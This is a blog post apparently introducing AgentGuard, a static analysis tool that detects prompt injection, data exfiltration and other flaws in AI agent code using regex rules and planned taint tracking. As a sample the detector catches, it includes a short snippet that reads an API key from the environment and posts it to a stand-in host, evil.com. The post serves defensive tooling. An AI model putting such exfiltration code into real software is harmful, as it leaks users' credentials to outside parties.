Source: dev.to

Beyond Regex: Building Detection Rules for AI Agent Vulnerabilities

AgentGuard, an open-source static analysis tool for AI agent vulnerabilities, uses regex-based rules to detect prompt injection and other flaws in source code. Its creator, Dockfix Labs, is developing AST-based semantic analysis to track taint flow and catch subtle patterns like data exfiltration. The tool currently covers 10 vulnerability categories and aims to make AI agent code as auditable as web application code.

Published Jun 28, 2026 · 2 min read

When I started building AgentGuard, the first question was: how do you detect a prompt injection vulnerability in source code?

Unlike traditional vulnerabilities (SQL injection, XSS), prompt injection doesn't have a single signature. It's a pattern of untrusted data flowing into LLM context. The vulnerability isn't in a function call -- it's in how data is constructed.

Every SAST tool starts with pattern matching. AgentGuard's first layer is regex-based rules:

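import re

# Flags an f-string assigned to a prompt-like name (prompt, system, message, instruction)
FSTRING_INJECTION = re.compile(
    r'(?:prompt|system|message|instruction)\s*[:=]\s*f["\'].*\{.*\}',
    re.I
)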

This catches the most common pattern: f-strings that embed user input directly into LLM prompts. It is blunt but effective. In a scan of 50 open-source agent codebases, this single rule found 127 instances.
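To make the rule concrete, here is a minimal sketch of how a line-by-line scan with it might look. The `scan_source` helper and the `SAMPLE` string are hypothetical names invented for this illustration; they are not taken from AgentGuard's codebase.

```python
import re

FSTRING_INJECTION = re.compile(
    r'(?:prompt|system|message|instruction)\s*[:=]\s*f["\'].*\{.*\}',
    re.I,
)


def scan_source(source: str) -> list[tuple[int, str]]:
    """Return (line number, stripped line) for every line the rule flags."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        if FSTRING_INJECTION.search(line):
            findings.append((lineno, line.strip()))
    return findings


# Hypothetical input: only the second line interpolates into a prompt.
SAMPLE = '''\
greeting = "hello"
prompt = f"You are a helper. {user_input}"
system_msg = "static text"
'''

for lineno, text in scan_source(SAMPLE):
    print(f"line {lineno}: {text}")
```

Because the rule looks at one line at a time, it cannot see an f-string that is built on one line and assigned to a prompt variable on another.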

Regex has limits. Consider:

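# Pattern A: f-string interpolation
prompt = f"You are a helper. {user_input}"

# Pattern B: str.format() on a template
template = "You are a helper. {input}"
prompt = template.format(input=user_data)

# Pattern C: concatenation inside a message list
messages = [{"role": "system", "content": config["system_prompt"] + user_message}]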

Pattern A is trivial to detect. Pattern B requires understanding .format() semantics. Pattern C requires tracking data flow through dictionaries and list construction.
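The gap is easy to confirm by running the f-string rule against the three patterns. This is a small check written for this article, not part of AgentGuard; the `PATTERNS` and `coverage` names are made up for the example.

```python
import re

FSTRING_INJECTION = re.compile(
    r'(?:prompt|system|message|instruction)\s*[:=]\s*f["\'].*\{.*\}',
    re.I,
)

# The three patterns from the text, one list of source lines per label.
PATTERNS = {
    "A": ['prompt = f"You are a helper. {user_input}"'],
    "B": [
        'template = "You are a helper. {input}"',
        'prompt = template.format(input=user_data)',
    ],
    "C": [
        'messages = [{"role": "system", '
        '"content": config["system_prompt"] + user_message}]'
    ],
}

# A pattern counts as detected if the rule fires on any of its lines.
coverage = {
    label: any(FSTRING_INJECTION.search(line) for line in lines)
    for label, lines in PATTERNS.items()
}
print(coverage)  # {'A': True, 'B': False, 'C': False}
```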

This is where AgentGuard is headed next: AST-based semantic analysis.

The next version of AgentGuard will parse Python and JavaScript ASTs to track taint flow:

Sources: user_input, query, message, request.body

Sinks: openai.chat.completions.create, prompt, messages, system

This is the same approach Semgrep and CodeQL use for traditional vulnerabilities, but specialized for LLM-specific sinks.
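As a rough illustration of the idea, the sketch below uses Python's standard `ast` module to propagate taint through top-level assignments and report when it reaches one of the names listed above. It is not AgentGuard's implementation: the helper names (`_is_tainted`, `find_tainted_sinks`) are hypothetical, the grouping into sources and sinks is my reading of the list, and the analysis ignores functions, branches, and reassignment to clean values.

```python
import ast

# Assumed grouping of the names listed above.
SOURCES = {"user_input", "query", "message", "request.body"}
SINK_NAMES = {"prompt", "messages", "system"}
SINK_CALLS = {"openai.chat.completions.create"}


def _is_tainted(node: ast.AST, tainted: set[str]) -> bool:
    """True if any name or dotted attribute inside `node` is tainted."""
    return any(
        isinstance(child, (ast.Name, ast.Attribute))
        and ast.unparse(child) in tainted
        for child in ast.walk(node)
    )


def find_tainted_sinks(source: str) -> list[tuple[int, str]]:
    """Walk top-level statements in order and report tainted sinks."""
    tainted = set(SOURCES)
    findings = []
    for stmt in ast.parse(source).body:
        # Propagate taint through assignments; flag sink-named targets.
        if isinstance(stmt, ast.Assign) and _is_tainted(stmt.value, tainted):
            for target in stmt.targets:
                name = ast.unparse(target)
                tainted.add(name)
                if name in SINK_NAMES:
                    findings.append((stmt.lineno, name))
        # Flag sink calls that receive a tainted argument.
        for node in ast.walk(stmt):
            if isinstance(node, ast.Call) and ast.unparse(node.func) in SINK_CALLS:
                args = [*node.args, *(kw.value for kw in node.keywords)]
                if any(_is_tainted(arg, tainted) for arg in args):
                    findings.append((node.lineno, ast.unparse(node.func)))
    return findings


SAMPLE = '''\
template = "You are a helper. {input}"
prompt = template.format(input=user_input)
messages = [{"role": "system", "content": config["system_prompt"] + query}]
openai.chat.completions.create(model="m", messages=messages)
safe = "static"
'''

for lineno, sink in find_tainted_sinks(SAMPLE):
    print(f"line {lineno}: tainted data reaches {sink}")
```

Even this toy version flags the .format() and list-concatenation cases that a single-line regex misses, because it reasons about the expression tree instead of the text. It requires Python 3.9 or later for `ast.unparse`.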

AgentGuard already does a simple form of correlation for ASI03 (Data Exfiltration):

import os
import requests

api_key = os.environ.get("API_KEY")  # line N: reads a secret
requests.post("https://evil.com/collect", headers={"Auth": api_key})  # line N+1: sends it out

The rule checks if a secret-access pattern appears on line N and a network-exfiltration pattern appears on line N+1. This catches the most dangerous pattern: an agent that reads credentials and sends them externally.
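A minimal sketch of that adjacent-line check might look like the following. The two regexes (`SECRET_ACCESS`, `NETWORK_SEND`) and the `find_exfiltration` helper are assumptions made for illustration; AgentGuard's actual patterns are not shown in this article.

```python
import re

# Hypothetical patterns; the real rule set may differ.
SECRET_ACCESS = re.compile(r'os\.environ|os\.getenv|api[_-]?key|secret', re.I)
NETWORK_SEND = re.compile(r'requests\.(?:post|put)|httpx\.(?:post|put)|urllib\.request')


def find_exfiltration(source: str) -> list[int]:
    """Return 1-based line numbers N where line N reads a secret
    and line N+1 makes an outbound network call."""
    lines = source.splitlines()
    hits = []
    for i in range(len(lines) - 1):
        if SECRET_ACCESS.search(lines[i]) and NETWORK_SEND.search(lines[i + 1]):
            hits.append(i + 1)
    return hits


ADJACENT = (
    'api_key = os.environ.get("API_KEY")\n'
    'requests.post("https://evil.com/collect", headers={"Auth": api_key})\n'
)
# The same two statements separated by an unrelated line.
SEPARATED = (
    'api_key = os.environ.get("API_KEY")\n'
    'log("starting")\n'
    'requests.post("https://evil.com/collect", headers={"Auth": api_key})\n'
)

print(find_exfiltration(ADJACENT))   # [1]
print(find_exfiltration(SEPARATED))  # []
```

The second case shows the limit of adjacency: a single intervening statement is enough to hide the flow, which is what function-level taint tracking is meant to address.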

Future versions will extend this to full function-level taint tracking.

AgentGuard currently covers all 10 categories:

ASI    Rule                     Detection Method
ASI01  Prompt Injection         Regex (f-string, concat, format)
ASI02  Tool Abuse               Regex (os.system, subprocess, eval)
ASI03  Data Exfiltration        Regex + cross-line correlation
ASI04  Excessive Agency         Regex (auto-execute, no-confirm)
ASI05  Supply Chain             Regex (untrusted pip install, dynamic import)
ASI06  Insecure Output          Regex (raw HTML, eval output)
ASI07  Credential Exposure      Regex (API keys, private keys, passwords)
ASI08  Context Manipulation     Regex (context stuffing, token bombing)
ASI09  Agent Loop Exploitation  Regex (recursive calls, no depth limit)
ASI10  Trust Boundary           Regex (mixed privilege, cross-agent calls)

The benchmark suite has 28 samples.

The long-term goal is simple: make AI agent code as auditable as web application code. We have Semgrep for web apps. We need AgentGuard for agent apps.

AgentGuard is MIT-licensed and open source. Install with pip install dfx-agentguard.
